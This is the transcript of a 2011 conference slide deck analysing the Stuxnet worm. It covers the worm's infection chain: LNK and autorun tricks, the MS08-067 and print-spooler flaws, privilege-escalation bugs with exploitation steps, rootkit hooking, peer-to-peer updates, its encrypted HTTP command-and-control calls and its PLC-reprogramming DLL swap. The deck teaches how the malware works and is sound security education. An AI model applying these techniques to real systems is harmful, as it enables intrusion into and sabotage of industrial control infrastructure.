Stuxnet dc9723
-
Upload
iftach-ian-amit -
Category
Technology
-
view
4.587 -
download
10
Transcript of Stuxnet dc9723
Tomer Teller , DC9723, 18/1/11
Stuxnet:How to take over a (nuclear) power plant
A Black Hat gone good (courier -> cracker)
Security Evangelist at Check PointSpecialize in network hacking &
reversingFinished all levels of Angry Birds (3
stars!)
Who Am I ?
We like MalwareStuxnet is a Malware! Iran is involvedMicrosoft got pwn'dLearn new techniquesSee some DEMO’s (hopefully)
Why are we here ?
SCADA/ICS - stands for Supervisory Control and Data Acquisition. It generally refers to Industrial Control Systems (ICS): computer systems that monitor and control industrial, infrastructure, or facility-based processes.
PLC - A Programmable Logic Controller (PLC) – Control of machinery on factory assembly lines.
Field PG - used to program PLCs.
Wincc/Step7 –SIEMENS application used to program PLC (IDE/Compiler) and is installed on a Field PG.
Terminology
Architecture Single DLL Resource containing payloads Component based
Exploits 4 un-disclosed vulns!
Techniques “cunning” hack LoadLibrary() maneuver
Threat Overview
This is not normal…
Statistics
ref: Symantec dossier paper
Welcome to the Battle Field
What’s going to happen?
Here
What’s going to happen?
Water Pipe
Gas pipeline
Nuclear Reactor
Mission Objectives
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
The First Infection
An Insider A Contractor A Scada Confrence USB Give-away Super Sheep over the fence
Removable Drive Propagation
Okay, now what ?
LNK auto-execution (MS10-046) Autorun.inf Technique
LNK Auto-Execution (MS10-046)
Design-Level flaw when parsing LNK files (i.e. shortcut file)
File format can store links to control panel applet (CPL) DLL
Vulnerable code processes these links like it processes icons.
Problem: System does not check if the DLL is in SYSTEM32 or part of a white list (registered)
The Result: Arbitrary DLLs can be loaded via a shortcut.
LNK Binary Format
OffsetSize Field0x0000 4 HeaderSize0x0004 16 LinkCLSID0x0014 4 LinkFlags (optional
structure)
.
.0x0042 4 (reserved)
Control Items
Offset Size Field0x0000 2 itemIDSize0x0002 2 wDummy...0x0018 n Path
LNK Binary Format (DIY)
We all know AutoRun.inf File & Dialog
The code that parses that file is very “flexible”
How flexible ?
Autorun.inf Technique
EXE
AutoRun
Autorun.inf Technique cont.
Whenever stuxnet needs to load a DLL (including itself), it uses a special method to bypass anti-virus behavior blocking detection.
Stuxnet calls LoadLibrary() with a special crafted name that does not exist and causes LoadLibrary() to fail.
NTdll.dll was hooked to monitor for request to load specially crafted file names
These filename are mapped to a different location – specified by Stuxenet.
File name example: KERNEL32.DLL.ASLR.[ADDRESS]
The LoadLibrary() Technique
User Space Rootkit Hide files by hooking Kernel32 & NTDLL
▪ FindFirstFileW ,FindNextFileW▪ NTQueryDirectoryFile, ZwQueryDirectoryFile
Kernel Space Rootkit Register a device driver (MrxNet.sys) to
intercept I/O Request Packets (IRP)▪ Monitor Directory Control & Query
(read/write)▪ Detect & Infect Removable Devices
User/Kernel Space rootkits
Driver was digitally signed by a legitimate certificate that is trusted by Windows.
Both companies seem to have offices in the Hsinchu Science and Industrial Park (Taiwan)
Compromised Certificates
No Admin?! No Problem! (Vista+ Style)
Privilege Escalation in Task Scheduler.20-11-2010www.exploit-db.com/exploits/15589
Task file’s is hashed by CRC32 Modify the original task to run under
localSystem Fix the CRC checksum by “padding”<-
Collision
No Admin?! No Problem! (XP Style)
Privilege Escalation in Keyboard Layout (MS10-073)
Keyboard layout can be loaded from any where in the system
Out of bound index into an array of function pointers in win32k.sys
cf12fa38 cf933423 win32k!KbdNlsFuncTypeDummy [index 0]cf12fa3c cf93342e win32k!KbdNlsFuncTypeNormal [index 1]cf12fa40 cf933474 win32k!KbdNlsFuncTypeAlt [index 2]cf12fa44 ff496867 [index 3]cf12fa48 ff466564 [index 4]cf12fa4c 60636261<- user space address [index 5]cf12fa50 0000006e .
1. Copy bad code to that address.
2. Change layout to point at index #5
3. Load the keyboard layout
Demo(s) Time
Autorun.inf LNK vulnerability (MS10-046)User Space RootKit (source
available)
Mission #1 Completed
Here
Recap
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
MS08-067 – Server Service Vulnerability
SRVSVC is an RPC interface which controls shares and files.
Binding to this interface via SMB and calling one of its functions -- NetprPathCanonicalize() with a malformed path string: e.g. /<name>/../../<rest of string>
Results in a buffer overflow Successful exploitation can lead to code execution with
System level privileges.
NetprPathCanonicalize()
\share\path1\path2/../../../../buff
\share\path1/../../../buff
\share/../../buff
/../buff
Search
For ‘\’
Search
For ‘\’
Search
For ‘\’
Search
For ‘\’
Buffer Overflow
MS10-061 – Printer Spooler Vulnerability
Released in 2009 in a hacker magazine
Allows a file to be written to the %System% folder by printing a document into a file.
Stuxnet “prints” 2 files A Managed object format (MOF) file – use for windows events The Stuxnet worm itself
Once the MOF file is detected by the OS in a specific directory (C:\windows\system\wbem\mof\<file>) Executes the event which is to run the executable file.
Network Shares Infection
Stuxnet enumerates all users accounts of the computer and the domain Try all available network resources
▪ Using the user credential Drop Stuxnet Executable on the remote
share▪ Schedule a network job to run 2 min afterNetScheduleJobAdd()
P2P Communication Component
Stuxnet installs an RPC Client / Server. Compromised computers can connect
and ask for the latest version
Infected machine
acting as Client
Infected machine
acting as Server
Get Version (0)
Send Version
Request Update (4)
Send Update
RPC Server Routines:0: Return Current Ver1: Inject & Execute2: Load module3: Inject to lsass.exe4: Send Current Version5: Create Process6: Read File
ref: Symantec dossier paper
Command & Control Component Stuxnet communicates back using an
HTTP C&C backdoor and encrypted data.
Infected
Machine
Command
And
Control
Server
GET
200 OKwww.msn.com
GET Index.php?data=[encrypted]
Command X
Command Y
ref: Symantec dossier paper
Mission #2 Completed
Here
Ping
Alive
Recap
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
PLC RootKit
On the Field PG, Stuxnet will look for: Specific version STEP7/WinCC Specific Network card Specific PLC model & version connected
Stuxnet will replace a DLL file that is in-charge of communicating with the PLC on the Field PG.
After replacement Stuxnet will be able to: Monitor PLC commands being written to and read
from Infect a PLC by inserting bad commands Mask the fact the PLC is infected
Infected PLC Example (READ/WRITE)
Step7/WinCC New DLL PLCOriginal DLL
Read()
Data
Modified
Data
Read()
Original
Data
Write()
Data
New DLLOriginal DLL
Write()
Wrote
Modified
Data
Field GP5 5 500
50055
? ? ?
5005005
Recap
Introduce Threat to Target
Propagate inside the network
Infect Field PG machines
GOAL:Reprogram ICS machines
Mission Accomplished
Who’s Behind It ?
Some say Israel: b:\myrtus\src\objfre_w2k_x86\i386 \guava.pdb
▪ myrtus -> myrtle -> Hadassah -> Queen Esther
▪ My-RTUs -> Remote Terminal Unit -> Control SCADA Systems
0x19790509▪ May 09, 1979. That date coincides with the
Iranian's execution of Habib Elghanian, a prominent Jewish businessman in Iran
Some say Germany Some say USA
Questions
?
kthxbye
Tomer [email protected]